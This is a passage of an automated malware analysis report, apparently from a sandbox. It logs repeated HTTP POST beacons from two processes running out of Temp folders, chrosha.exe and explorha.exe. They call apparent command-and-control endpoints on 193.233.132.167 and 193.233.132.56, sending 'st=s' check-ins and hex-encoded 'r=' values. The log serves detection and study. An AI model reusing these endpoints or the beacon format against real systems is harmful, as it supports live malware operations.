                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:49.071283102 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
835 | 192.168.2.5 | 50683 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:49.089917898 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:49.338819981 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
836 | 192.168.2.5 | 50684 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:49.327337027 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:49.580192089 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
837 | 192.168.2.5 | 50685 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:49.591481924 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:49.844173908 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
838 | 192.168.2.5 | 50686 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:49.937822104 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:50.176759958 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
839 | 192.168.2.5 | 50687 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:50.209768057 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:50.458019018 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
840 | 192.168.2.5 | 50688 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:50.429778099 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:50.681679964 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
841 | 192.168.2.5 | 50689 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:50.705348969 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:50.953484058 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
842 | 192.168.2.5 | 50690 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:51.043363094 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:51.291095018 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
843 | 192.168.2.5 | 50692 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:51.336133003 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:51.583940983 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
844 | 192.168.2.5 | 50693 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:51.543253899 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:51.797352076 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
845 | 192.168.2.5 | 50694 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:51.942477942 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:52.185715914 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
846 | 192.168.2.5 | 50695 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:52.164560080 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:52.412255049 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
847 | 192.168.2.5 | 50696 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:52.437187910 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:52.689637899 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
848 | 192.168.2.5 | 50697 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:52.661782026 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:52.908240080 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
849 | 192.168.2.5 | 50698 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:53.043832064 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:53.289475918 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
850 | 192.168.2.5 | 50699 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:53.275405884 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:53.519620895 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
851 | 192.168.2.5 | 50700 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:53.543054104 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:53.791717052 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
852 | 192.168.2.5 | 50701 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:53.778939962 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
